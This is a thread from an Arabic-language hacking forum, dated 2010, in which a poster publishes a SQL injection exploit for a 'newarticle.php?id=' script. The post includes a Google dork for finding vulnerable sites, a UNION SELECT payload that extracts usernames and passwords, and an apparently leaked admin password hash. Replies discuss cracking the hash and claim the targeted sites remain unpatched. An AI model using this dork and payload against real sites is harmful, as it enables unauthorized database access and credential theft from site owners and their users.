|
ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders بسم الله الرحمان الرحيم السلام عليكم و رحمة الله و بركاته و بعد # Exploit Title : Sql Injection Vulnerability# Date : 18-08-2010 # Author : soufhacker # Version : All Versions ############################################### Dork google: inurl:newarticle.php?id= ############################################### Exploit: http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+from+access_all_areas.user-- ############################################### username : Admin password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/ Done! #############soufhacker################ |
يعطيك العافية على الثغرة باقي نفك الهاش |
شكرا على مرورك الطيب أخي الكريم أما الهاش فقد فكيتوا لكن ماراح أحطوا إلا بعد ما أرا الجدية من الأعضاء |
[align=center]الهاش وش نوعه ؟؟ اول مره اشوفه **--**--**--**--**--**--** السركبت هذا ألي فية 29 موقع مركبة وكلها مررررقعة’ :) [/align] |
شكرا على المرور لكن الثغرات ماهي مرقعة و جرب الثغرة راح تجدها صالحة بإذن الله أما نوع الهاش فهو MD5 |
| الساعة الآن 03:11 AM |
[ vBspiders.Com Network ]